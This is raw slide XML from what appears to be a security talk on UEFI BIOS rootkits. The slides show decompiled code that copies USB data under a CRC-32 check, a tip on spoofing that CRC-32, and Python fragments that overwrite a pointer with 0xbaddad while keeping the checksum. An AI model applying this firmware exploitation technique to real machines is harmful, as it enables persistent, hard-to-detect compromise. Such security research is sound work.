              </a:rPr>
              <a:t>The fix?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="665" name="Shape 665"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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670" name="Shape 670"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="671" name="Shape 671"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656200" y="1556350"/>
            <a:ext cx="11225100" cy="4549800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>The only thing left do is to learn what the sub_1A80C function checks…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ( &amp;buffer != (usb_data + 0x70) )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="387350" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>memcpy(&amp;buffer, (usb_data + 0x70), 0x320ui64);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ( &amp;v19 != (usb_data + 0x6B0) )</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	memcpy(&amp;v19, (usb_data + 0x6B0), 0x150ui64);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ( &amp;v20 != (usb_data + 0x950) )</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	memcpy(&amp;v20, (usb_data + 0x950), 0x150ui64);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ( &amp;v21 != (usb_data + 0x7188) )</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	memcpy(&amp;v21, (usb_data + 0x7188), 0x190ui64);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="387350" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>calculate_crc32(&amp;buffer, 0x7A0ui64, &amp;crc_array[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>calculate_crc32(crc_array, 0xCui64, crc_out);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>To spoof CRC-32 hash, we can simply correct 4 consecutive bytes after changing the data we are interested in, by simply using the python script from Project Nayuki.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Shape 672"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837700" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>The fix</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="Shape 673"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44700" cy="886800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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301" name="Shape 301"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Shape 302"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>UEFI BIOS rootkits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Shape 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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04" name="Shape 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5018252"/>
            <a:ext cx="12192000" cy="361103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Alex Matrosov. Betra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>yi</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>ng The BIOS. Where the Guardians Of The BIOS Are Failing]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>						</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Shape 305"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642796" y="1557784"/>
            <a:ext cx="10805204" cy="3157644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>UEFI BIOS security and possible rootkit injection has become a red-hot-topic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="77B82A"/>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9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>						</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="306" name="Shape 306"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1688383" y="2973163"/>
            <a:ext cx="8305057" cy="182471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678" name="Shape 678"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679" name="Shape 679"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656200" y="1556350"/>
            <a:ext cx="11225100" cy="4549800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Considering CRC-32 hash saving, we can modify the pointer like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>bad_ptr = 0xbaddad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>buf_size = 0x10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>buffer = mem_read(usb_data + 0x70, buf_size)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>crc32 = get_buffer_crc32(buffer)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># replace the pointer (usb_data + 0x78)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="73333"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>buffer = buffer[0:8] + pack(‘&lt;Q’, bad_ptr)</a:t>
            </a:r>
